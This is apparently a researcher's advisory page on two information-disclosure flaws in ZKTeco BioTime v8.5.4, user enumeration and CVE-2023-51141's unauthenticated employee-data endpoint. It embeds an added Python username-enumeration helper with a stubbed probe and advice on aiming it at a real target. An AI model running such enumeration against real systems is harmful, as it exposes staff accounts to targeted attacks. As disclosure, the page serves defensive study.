Abdulwahab ipxsec

  • Freelancer
  • Saudi Arabia
  • X @ipxsec

User Enumeration

Description:

An issue in ZKTeco BioTime v.8.5.4 allows a remote attacker to obtain sensitive information.

Impact

Because the affected endpoint reveals whether a given username exists, an attacker can brute-force a list of common usernames to confirm which accounts are present, or generate valid username lists from census data of common last names by appending each letter of the alphabet to every name.
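The following is an added example, not code from the gist or from ZKTeco: it builds the candidate list the paragraph above describes and then uses a response-differential oracle to separate existing usernames from unknown ones. The page gives neither the endpoint nor the exact response difference, so the network side is a constructed stand-in (`fake_probe`), the wordlists are constructed samples, and both letter orderings (last name plus letter, as the writeup says, and initial plus last name) are generated as a generalization.

```python
"""Username enumeration helper: candidate generation plus a
response-differential oracle.

Added example, not code from the original gist. The login/lookup endpoint,
its parameters and the exact way BioTime distinguishes valid from invalid
usernames are NOT given on the page, so the network side is replaced by a
constructed stand-in (fake_probe). Wrap a real request in its place only
against systems you are authorised to test.
"""
import string
from dataclasses import dataclass
from typing import Callable, Iterable, Sequence

# Constructed sample wordlists standing in for "common usernames" and
# census-derived common last names.
COMMON_USERNAMES = ["admin", "administrator", "hr", "test", "guest"]
COMMON_LASTNAMES = ["smith", "johnson", "williams"]

# Both orderings are generated: the writeup describes appending a letter to
# the last name; initial-first (jsmith) is the other common scheme.
DEFAULT_PATTERNS: Sequence[str] = ("{ln}{c}", "{c}{ln}")


def candidate_usernames(common: Iterable[str], lastnames: Iterable[str],
                        patterns: Sequence[str] = DEFAULT_PATTERNS) -> list[str]:
    """Common usernames first, then every last name combined with every
    letter of the alphabet under each pattern. Duplicates are dropped while
    preserving order so no name is probed twice."""
    seen: set[str] = set()
    out: list[str] = []

    def add(name: str) -> None:
        if name not in seen:
            seen.add(name)
            out.append(name)

    for name in common:
        add(name.lower())
    for ln in lastnames:
        for pat in patterns:
            for c in string.ascii_lowercase:
                add(pat.format(ln=ln.lower(), c=c))
    return out


@dataclass(frozen=True)
class Probe:
    """What one request tells us; these fields form the fingerprint."""
    status: int
    body_length: int
    marker: str  # e.g. the error message text (assumed response shape)


def enumerate_users(candidates: Iterable[str], probe: Callable[[str], Probe],
                    baseline_user: str = "zzq9v3x_not_a_real_user") -> list[str]:
    """Return candidates whose response differs from a known-invalid baseline.

    Comparing status, length and marker together catches the usual leaks
    (different status, message or template) without knowing the exact
    vulnerable string in advance. The baseline must be a name that certainly
    does not exist. Timing differences are a further signal not measured here.
    """
    base = probe(baseline_user)
    return [u for u in candidates if probe(u) != base]


# Constructed stand-in for the vulnerable endpoint: an existing account gets
# a different error than an unknown one. A real probe would send the request
# (urllib/requests) and return status, len(body) and the parsed message.
_FAKE_DIRECTORY = {"admin", "hr", "asmith"}


def fake_probe(username: str) -> Probe:
    if username in _FAKE_DIRECTORY:
        return Probe(400, 52, "incorrect password")
    return Probe(400, 44, "user does not exist")


if __name__ == "__main__":
    cands = candidate_usernames(COMMON_USERNAMES, COMMON_LASTNAMES)
    found = enumerate_users(cands, fake_probe)
    print(f"{len(cands)} candidates probed, {len(found)} confirmed: {found}")
```

When pointing this at a real target, choose the baseline name so it cannot collide with an existing account, and collect the fingerprint fields from the actual response rather than hard-coding them; if status and body are identical for valid and invalid names, a timing comparison is the next thing to measure.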

Vulnerability path:

@ipxsec
ipxsec / CVE-2023-51141.md
Last active February 28, 2024 08:13
CVE-2023-51141

Information Disclosure - Internal Users

Description:

ZKTeco BioTime v.8.5.4 contains an endpoint that discloses employee data (name, employee ID, photo, etc.) and can be reached without any authentication or authorization check.

Impact

An attacker can use the disclosed data to build a picture of the organization's systems and staff and to stage further targeted attacks; for example, the disclosed usernames and employee IDs can be used to attempt access to other employee-only systems. The data can also be leaked publicly on the internet.

Vulnerability path: